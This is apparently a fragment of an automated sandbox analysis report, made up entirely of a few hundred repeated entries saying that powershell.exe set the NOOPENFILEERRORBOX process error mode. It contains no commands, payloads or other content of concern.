                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
